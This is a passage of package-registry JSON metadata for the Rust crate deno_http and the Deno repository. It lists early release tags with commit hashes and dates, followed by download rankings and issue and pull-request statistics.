parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T05:51:46.604Z","dependent_packages_count":9,"downloads":668941,"downloads_period":"total","dependent_repos_count":30,"rankings":{"downloads":5.123392162728089,"dependent_repos_count":5.161531558480407,"dependent_packages_count":4.22818591153196,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.557792219476752},"purl":"pkg:cargo/deno_http","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_http","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_http","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_http/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/